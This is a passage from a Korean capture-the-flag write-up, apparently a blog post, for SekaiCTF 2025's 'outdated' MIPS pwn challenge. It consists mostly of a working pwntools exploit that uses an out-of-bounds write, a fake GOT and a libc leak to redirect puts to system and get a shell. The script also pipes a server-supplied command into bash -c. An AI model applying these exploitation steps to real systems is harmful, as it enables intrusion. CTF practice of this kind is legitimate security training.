#__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\npi()\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">solve.py (server)<\/h2>\n\n\n\n<pre 
class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\ncontext.log_level = 'debug'\ncontext(arch='mips', os='linux', bits=32, endian='little')\nwarnings.filterwarnings('ignore')\nimport sys\n\n# p = remote(\"127.0.0.1\", 1337)\n# p = process(\".\/run2_dbg.sh\")\n# p = process(\".\/run2.sh\")\np = remote(\"outdated-boecxic4xpz8.chals.sekai.team\", 1337, ssl=True)\n\ne = ELF('.\/outdated',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/target\/lib\/libc.so', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nru(\"proof of work: \")\ncmd = rl()\ninfo(f\"cmd: {cmd}\")\n\nproc = subprocess.run(\n    [\"bash\", \"-c\", cmd],\n    stdout=subprocess.PIPE,\n    stderr=subprocess.PIPE,\n    text=True,        # \uacb0\uacfc\ub97c str \ub85c \ubc1b\uae30 \uc704\ud568\n    check=True        # \uc5d0\ub7ec \uc2dc \uc608\uc678 \ubc1c\uc0dd\n)\n\nanswer = proc.stdout.strip()\n\ninfo(f\"answer: {answer}\")\n\nsl(answer)\n\nru(b\"Here's a little bit of helpful information:\")\nleak = rl().strip()\nleak = int(leak, 16)\ninfo(f\"leak: {hex(leak)}\")\n\ne.address = leak - e.sym.main\npie_base = e.address\ninfo(f\"pie_base: {hex(e.address)}\")\n\n# pay = p32(e.sym.main + 0x1f0)\n# pay += b\"ABCDEFGHIJKL\"\n# pay += p32(e.sym.exit) + 
b\"QRSTUVWXYZabcdefghijk;lmnopqrstuvwxyz0123456789\"\n# pay = pay + b\"\\\\x41\"*(0x5f-len(pay))\n\n# guessed_libc_base = pie_base - 0x8f4000 # = 0x3f70c000\n# info(f\"guessed_libc_base: {hex(guessed_libc_base)}\")\n# l.address = guessed_libc_base\n\n# pay = b\"A\"*0x5f\n#fake gp!!!! fake got!!!!\npay = p32(e.got.puts - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(e.sym.puts_blue)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(e.sym.puts_blue)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\n'''\n.got:00020010  # ===========================================================================\n.got:00020010\n.got:00020010  # Segment type: Pure data\n.got:00020010                 .data # .got\n.got:00020010 off_20010:      .word _stdout            # 
DATA XREF: sub_6F0\u2191o\n.got:00020010                                          # sub_740\u2191o ...\n.got:00020014                 .word 0x80000000\n.got:00020018 _term_proc_ptr: .word _term_proc\n.got:0002001C _init_proc_ptr: .word _init_proc\n.got:00020020 main_ptr:       .word main\n.got:00020024                 .word unk_20004\n.got:00020028 __RLD_MAP_ptr:  .word __RLD_MAP\n.got:0002002C                 .word off_20090\n.got:00020030                 .word _stdout   &lt;- string by puts\n.got:00020034 puts_blue_ptr:  .word puts_blue &lt;- fake gp start !!!!!!!!!!!!!! fake_gp = 0x200c0 \n.got:00020038 game_name_ptr:  .word game_name\n.got:0002003C                 .word _stdout\n.got:00020040                 .word _stdout\n.got:00020044                 .word _stdout\n.got:00020048 __register_frame_info_ptr:.word __register_frame_info\n.got:0002004C __libc_start_main_ptr:.word __libc_start_main\n.got:00020050 setbuf_ptr:     .word setbuf\n.got:00020054 exit_ptr:       .word exit !!!!!!!!!!!!!\n                                        exit \ub300\uc2e0\uc5d0 main \ub4e4\uc5b4\uac00\uac8c \ub9cc\ub4dc\ub294\uac74 \uc26c\uc6c0, \uc790\uccb4\uc801\uc73c\ub85c write\ud558\uba74 \ub418\ub2c8\uae4c ... 
+0x10\ud558\uba74 _ITM_deregisterTMCloneTable?\n                                        \uc2e4\uc81c\ub85c \uc27d\uc9c0 \uc54a\uc74c;; -0x34 \ub610\ub294 game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30 \uc704\ud574 \ucd5c\uc18c +0x6c \uc774\uc0c1\n.got:00020058 stderr_ptr:     .word stderr\n.got:0002005C scanf_ptr:      .word scanf\n.got:00020060 strcspn_ptr:    .word strcspn\n.got:00020064 _ITM_deregisterTMCloneTable_ptr:.word _ITM_deregisterTMCloneTable \n.got:00020068 stdin_ptr:      .word stdin\n.got:0002006C _ITM_registerTMCloneTable_ptr:.word _ITM_registerTMCloneTable\n.got:00020070 __deregister_frame_info_ptr:.word __deregister_frame_info\n.got:00020074 __stack_chk_fail_ptr:.word __stack_chk_fail\n.got:00020078 __cxa_finalize_ptr:.word __cxa_finalize\n.got:0002007C puts_ptr:       .word puts  !!!!!!!! puts \ub300\uc2e0\uc5d0 main\uc5d0 \ub4e4\uc5b4\uac00\ub824\uba74... -0x5c\ud574\uc11c got\uc758 main \uac00\ub9ac\ud0a4\uac70\ub098, \ub610\ub294 +0x44\ud574\uc11c game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30\n                                            puts \ub300\uc2e0\uc5d0 printf \ub4e4\uc5b4\uac00\ub824\uba74,,,+0x10 \ub354\ud574\uc57c\ud568;; 2007c-0x34 = 20048; __register_frame_info\n                                            puts \ub300\uc2e0\uc5d0 puts_blue \ub4e4\uc5b4\uac00\ub824\uba74, \n.got:00020080 fgets_ptr:      .word fgets   \n.got:00020084 __stack_chk_guard_ptr:.word __stack_chk_guard\n.got:00020088 stdout_ptr:     .word stdout\n.got:0002008C printf_ptr:     .word printf\n.got:0002008C\n.sdata:00020090  # ===========================================================================\n.sdata:00020090\n.sdata:00020090  # Segment type: Pure data\n.sdata:00020090                 .sdata\n.sdata:00020090 off_20090:      .word off_20090          # DATA XREF: sub_7B4+30\u2191o\n.sdata:00020090                                          # sub_7B4+3C\u2191r ...\n.sdata:00020090\nLOAD:00020094  # 
===========================================================================\nLOAD:00020094\nLOAD:00020094  # Segment type: Pure data\nLOAD:00020094                 .data # LOAD\nLOAD:00020094                 .align 4\nLOAD:00020094\n.bss:000200A0  # ===========================================================================\n.bss:000200A0\n.bss:000200A0  # Segment type: Uninitialized\n.bss:000200A0                 .bss\n.bss:000200A0 dword_200A0:    .space 4                 # DATA XREF: sub_7B4+20\u2191r\n.bss:000200A0                                          # sub_7B4+70\u2191w\n.bss:000200A4 dword_200A4:    .space 4                 # DATA XREF: sub_838+2C\u2191o\n.bss:000200A8                 .space 4\n.bss:000200AC                 .space 4\n.bss:000200B0                 .space 4\n.bss:000200B4                 .space 4\n.bss:000200B8                 .space 4\n.bss:000200BC                 .space 4\n.bss:000200C0                 .globl game_name\n.bss:000200C0  # _BYTE game_name[96]\n.bss:000200C0 game_name:      .space 0x60              # DATA XREF: LOAD:000003D8\u2191o\n'''\n\n# LEAK TEST!!!!!!!\n# # ru(\"your game\")\n# # rl()\n# leak = ru(\".\\\\n\")\n# leak = rl()\n# # leak = r(4)\n# # leak = leak[3:3+4]\n# # leak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\n# info(f\"leak: {(hex(leak))}\")\n# # l.address = leak - l.sym.stderr\n# # success(f\"libc_base: {(hex(l.address))}\")\n# p.close()\n\n# ru(\"your game\")\n# rl()\nleak = ru(\".\\\\n\")\nleak = rl()\n# leak = r(4)\nleak = leak[5:5+4]\nleak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\ninfo(f\"leak: {(hex(leak))}\")\nl.address = leak - l.sym.puts\nsuccess(f\"libc_base: {(hex(l.address))}\")\n\n#main again\n#fake gp!!!! fake got!!!!\npay = p32(l.address + 0xAAF20 - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(l.sym.system)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... 
dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(l.sym.system)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\npi()\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<p><strong><code>SEKAI{!'VE-dUBB3D_+hI$-73(HN1QUE-\"9P-*VERWR17E\"}<\/code><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1024x576.png\" alt=\"\" class=\"wp-image-3925\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1024x576.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-300x169.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-768x432.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1536x864.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2.png 1920w\" sizes=\"auto, 
(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>checksec Decompiled-src \/ Analysis \ucf54\ub4dc\ub85c \uc54c\uc544\ubcf4\uae30 \ud798\ub4e4\uae30 \ub54c\ubb38\uc5d0 ghidra\ub97c \ud65c\uc6a9\ud558\uac70\ub098 \uc5b4\uc148\ube14\ub9ac\uc5b4 \ucf54\ub4dc\ub85c \ubcf4\ub294\uac8c \ub0ab\ub2e4. \uadf8\ub098\ub9c8 \uc54c\uc544\ubcf4\uae30 \uc27d\ub2e4. \ud558\uc9c0\ub9cc \ub9e4\uac1c\ubcc0\uc218\ub294 \uc81c\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uc9c4 \uc54a\ub294\ub2e4. \ubd84\uc11d\ud558\uae30 \uc88b\ub2e4. \ucde8\uc57d\uc810\uae4c\uc9c0 \uc54c\ub824\uc8fc\ub294 \uc0c1\ud669\uc774\ub2e4. \ubcf4\ub2e4\uc2dc\ud53c main \ud568\uc218 \uc8fc\uc18c\ub97c \ucd9c\ub825\ud574\uc8fc\uace0, game_name \uc804\uc5ed\ubc30\uc5f4\uc5d0 95\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4. level_rewards \uc9c0\uc5ed\ubc30\uc5f4\uc5d0\uc11c OOB write \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud558\uba70, level_index\ub97c \ud1b5\ud574 \uc4f0\uc5ec\uc9c8 \ub300\uc0c1 \uc8fc\uc18c, new_reward\ub85c \uc4f8 \uac12 2\ubc14\uc774\ud2b8\ub97c \uc815\ud560 \uc218&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3923\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[SekaiCTF2025] outdated 
(mips)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[79,25],"class_list":["post-3923","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-mips","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3923"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923\/revisions"}],"predecessor-version":[{"id":3926,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923\/revisions\/3926"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3923"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3923"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}